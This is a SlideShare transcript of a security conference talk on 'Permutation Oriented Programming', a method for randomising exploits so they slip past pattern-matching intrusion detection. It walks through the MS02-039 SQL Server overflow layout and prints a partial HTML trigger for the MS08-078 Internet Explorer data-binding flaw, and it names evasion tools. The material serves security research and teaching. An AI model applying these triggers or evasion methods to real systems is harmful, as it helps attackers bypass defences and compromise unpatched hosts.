• Save
Permutation Oriented Programming
Upcoming SlideShare
Loading in...5
×
 

Permutation Oriented Programming

on

  • 1,175 views

Permutation Oriented Programming is the simplest way to avoid security solution detection and shows the Pattern Matching technology weakness.

Permutation Oriented Programming is the simplest way to avoid security solution detection and shows the Pattern Matching technology weakness.

Statistics

Views

Total Views
1,175
Slideshare-icon Views on SlideShare
1,043
Embed Views
132

Actions

Likes
1
Downloads
0
Comments
0

10 Embeds 132

http://pimentanetwork.blogspot.com 45
http://pimentanetwork.blogspot.com.br 39
http://fnstenv.blogspot.com 37
http://www.pimentanetwork.blogspot.com 3
http://www.slashdocs.com 2
http://twitter.com 2
http://translate.googleusercontent.com 1
http://7378201184975825241_0241d62974bceaaa6ab812d5aa2d6403ba2edab0.blogspot.in 1
http://us-w1.rockmelt.com 1
http://pimentanetwork.blogspot.de 1
More...

Accessibility

Categories

Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

    Permutation Oriented Programming Permutation Oriented Programming Presentation Transcript

    • Agenda• 0000 – Once upon a time… • 0100 – Advanced• 0001 – Introduction • 0101 – Demonstration• 0010 – Brain at work • 0110 – Conclusions• 0011 – Approach • 0111 – Questions and Answers
    • nbrito@pitbull:~$ whoami• Nelson Brito: • Computer/Network Security Researcher Enthusiast • Spare-time Security Researcher • Addict for systems’ (in)security • sekure SDI• Home town: • Rio de Janeiro• Public tools: • T50: an Experimental Mixed Packet Injector • Permutation Oriented Programming • ENG++ SQL Fingerprint™• WEB: • http://about.me/nbrito
    • Once upon a time…
    • Before starting0-Day Pattern-matching• 0-day is cool, isn’t it? But only if nobody is aware of its • This technology is as need today as it was in the past, existence. but the security solution cannot rely only on this.• Once the unknown vulnerability becomes known, the • No matter how fast is the pattern-matching 0-day will expire – since a patch or a mitigation is algorithm, if a pattern does not match, it means that released (which comes first). there is no vulnerability exploitation.• So we can conclude that, once expired (patched or • No vulnerability exploitation, no protection action… mitigated), 0-day has no more value. If you do not But what if the pattern is wrong? believe me, you can try to sell a well-known vulnerability to your vulnerability-broker. • How can we guarantee that the pattern, which did not match, is the correct approach for a protection• Some security solutions fight against 0-day faster action? Was the detection really designed to detect than the affected vendor. the vulnerability?
    • Some conceptsExploitation Vulnerability• There are lots of good papers and books describing • Any vulnerability has a trigger, which leads the the exploitation techniques. Thus, I do recommend vulnerability to a possible and reasonable exploitation. you to look for them for a better understanding. • For some weakness types the vulnerability allows to• This lecture has no pretension of being a complete control the flow of software’s execution, executing reference for this topic. an arbitrary code (shellcode), such as: CWE-119, CWE- 120, CWV-134, CWE-190, CWE-196, CWE-367, etc.• The exploitation path described here is something that I decided to follow, and it helped me to • Before executing a shellcode, the exploitation must understand and apply POP (f.k.a. ENG++) to the deal with the vulnerable ecosystem (trigger, return vulnerabilities. address, etc…), performing memory manipulation on additional entities (such as: offset, register,• All the definitions are in compliance with: JUMP/CALL, stack, heap, memory alignment, memory padding, etc). – Common Vulnerabilities and Exposures. – Common Vulnerability Scoring System. – Common Weakness Enumeration.
    • Current evasion techniques (a.k.a. TT)Techniques Tools• Packet fragmentation • Fragroute / Fragrouter / Sniffjoke• Stream segmentation • ADMutate / ALPHA[2-3] / BETA3 / Others• Byte and traffic insertion • Whisker / Nikto / Sandcat• Polymorphic shellcode • Snot / Stick / IDS-wakeup / Others• Denial of Service • Sidestep / RPC-evade-poc.pl / Others• URL obfuscation (+ SSL encryption) • Predator (AET)• RPC fragmentation • Etc…• HTML and JavaScript obfuscation• Etc…
    • What is Permutation Oriented Programming?The scenario The technique• Remember: “Some security solutions fight against 0- • To circumvent or avoid a pattern-matching day faster than the affected vendor”. technology, there are two options: – Easier: know how the vulnerability is detected• This protection (mitigation) has a long life, and (access to signature/vaccine). sometimes the correct protection (patch) is not – Harder: know deeply how to trigger the applied. vulnerability and how to exploit it (access to vulnerable ecosystem).• People’s hope, consequently their security strategy, resides on this security model: vulnerability mitigated, • Permutation Oriented Programming: no patch… – Deep analysis of a vulnerability, (re)searching for alternatives.• But what if an old and well-known vulnerability could – Use all the acquired knowledge and alternatives be exploited, even on this security approach model? to offer a variety of decision points (variants). – Intended to change the behavior of exploit• According to pattern-matching, any new variant of an developers. old vulnerability exploitation is considered a new – Use randomness to provide unpredictable vulnerability, because there is no pattern to be payloads, i.e., permutation. matched yet!
    • What is Permutation Oriented Programming?The scenario The technique• Remember: “Some security solutions fight against 0- • To circumvent or avoid a pattern-matching day faster than the affected vendor”. technology, there are two options: – Easier: know how the vulnerability is detected• This protection (mitigation) has a long life, and (access to signature/vaccine). sometimes the correct protection (patch) is not – Harder: know deeply how to trigger the applied. vulnerability and how to exploit it (access to vulnerable ecosystem).• People’s hope, consequently their security strategy, resides on this security model: vulnerability mitigated, • Permutation Oriented Programming: no patch… – Deep analysis of a vulnerability, (re)searching for alternatives.• But what if an old and well-known vulnerability could – Use all the acquired knowledge and alternatives be exploited, even on this security approach model? to offer a variety of decision points (variants). – Intended to change the behavior of exploit• According to pattern-matching, any new variant of an developers. old vulnerability exploitation is considered a new – Use randomness to provide unpredictable vulnerability, because there is no pattern to be payloads, i.e., permutation. matched yet!
    • What is Permutation Oriented Programming?The scenario The technique• Remember: “Some security solutions fight against 0- • To circumvent or avoid a pattern-matching day faster than the affected vendor”. technology, there are two options: – Easier: know how the vulnerability is detected• This protection (mitigation) has a long life, and (access to signature/vaccine). sometimes the correct protection (patch) is not – Easier: know deeply how to trigger the applied. vulnerability and how to exploit it (access to vulnerable ecosystem).• People’s hope, consequently their security strategy, resides on this security model: vulnerability mitigated, • Permutation Oriented Programming: no patch… – Deep analysis of a vulnerability, (re)searching for alternatives.• But what if an old and well-known vulnerability could – Use all the acquired knowledge and alternatives be exploited, even on this security approach model? to offer a variety of decision points (variants). – Intended to change the behavior of exploit• According to pattern-matching, any new variant of an developers. old vulnerability exploitation is considered a new – Use randomness to provide unpredictable vulnerability, because there is no pattern to be payloads, i.e., permutation. matched yet!
    • POP (pronounced /pŏp/) techniqueThe truth The examples• POP technique deals with vulnerable ecosystem and • Server-side vulnerabilities: memory manipulation, rather than shellcode – it is – MS02-039: CVE-2002-0649/CWE-120. neither a new polymorphic shellcode technique, nor – MS02-056: CVE-2002-1123/CWE-120. an obfuscation technique. • Client-side vulnerabilities:• POP technique can be applied to work with Rapid7 Metasploit Framework, CORE Impact Pro, Immunity – MS08-078: CVE-2008-4844/CWE-367. CANVAS Professional, and regular stand-alone – MS09-002: CVE-2009-0075/CWE-367. proof-of-concepts (freestyle coding). • Windows 32-bit shellcodes:• POP technique is neither an additional entropy for – 波動拳: “CMD /k”. tools mentioned above, nor an Advanced Evasion – 昇龍拳: “CMD /k set DIRCMD=/b”. Technique (AET). Instead, POP technique can empower both of them. • All example modules were ported to work with Rapid7 Metasploit Framework, but there are also• POP technique maintains the exploitation reliability, examples for client-side in HTML and JavaScript. even using random decisions, it is able to achieve all exploitation requirements.
    • What if… exploit #1
    • What if… exploit #1 exploit #2
    • What if… exploit #1exploit #N exploit #2
    • What if… exploit #1exploit #N exploit #2 shared zone
    • What if… exploit #1exploit #N exploit #2 shared zone
    • What if… exploit #1exploit #N exploit #2 shared zone Permutation Oriented Programming
    • VulnerabilitiesMS02-039 MS08-078• Common Vulnerabilities and Exposures: • Common Vulnerabilities and Exposures: – CVE-2002-0649. – CVE-2008-4844.• Common Weakness Enumeration: • Common Weakness Enumeration: – CWE-120. – CWE-367.• CVSS Severity: 7.5 (HIGH). • CVSS Severity: 9.3 (HIGH).• Target: • Target: – Microsoft SQL Server 2000 SP0-2. – Microsoft Internet Explorer 5.01 SP4, 6 SP0-1, 7 and 8 Beta 2.• Vulnerable ecosystem: – Protocol UDP. • Vulnerable ecosystem: – Communication Port 1434. – DHTML with embedded Data binding. – SQL Request CLNT_UCAST_INST. – XML Data Source Object (DSO). – INSTANCENAME >= 96 bytes. – Data Consumer (HTML element) pointing to a – INSTANCENAME != NULL. dereferenced XML DSO.
    • CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
    • memory manipulation vulnerability CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
    • memory manipulation vulnerability memory stack CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
    • memory manipulation vulnerability 0x04 request memory stack CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
    • memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename memory stack CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
    • memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename overflow CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
    • memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename additional entities overflow CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
    • memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return address additional entities overflow CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
    • memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump address padding additional entities overflow CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
    • memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities overflow CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
    • memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
    • memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
    • memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow esp shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
    • memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow esp shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
    • memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow esp shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
    • memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow esp shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
    • memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow esp shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
    • memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
    • memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
    • memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
    • memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return address jump padding writable address Trigger additional entities padding overflow shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
    • memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return address jump padding writable address Permutation additional entities padding overflow shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
    • memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding Exploitation overflow shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
    • <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
    • memory manipulation vulnerability <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
    • memory manipulation vulnerability Internet Explorer (Data Consumers) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
    • memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
    • memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
    • memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CElement::GetAAdataFld DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
    • memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CElement::GetAAdataSrc DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
    • memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CRecordInstance::CRecordInstance DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
    • memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CCurrentRecordConsumer::Bind DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
    • memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CCurrentRecordInstance::GetCurrentRecordInstance DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
    • memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CXfer::CreateBinding DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
    • memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CElement::GetAAdataFld DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
    • memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CElement::GetAAdataSrc DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
    • memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CRecordInstance::AddBinding DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
    • memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CImplPtrAry::Append DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
    • memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
    • memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
    • memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CElement::GetAAdataFld DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
    • memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CElement::GetAAdataSrc DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
    • memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CRecordInstance::CRecordInstance DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
    • memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CCurrentRecordConsumer::Bind DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
    • memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CCurrentRecordInstance::GetCurrentRecordInstance DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
    • memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CXfer::CreateBinding DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
    • memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CElement::GetAAdataFld DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
    • memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CElement::GetAAdataSrc DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
    • memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CRecordInstance::AddBinding DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
    • memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CImplPtrAry::Append DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
    • memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
    • memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CRecordInstance::TransferToDestination DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
    • memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
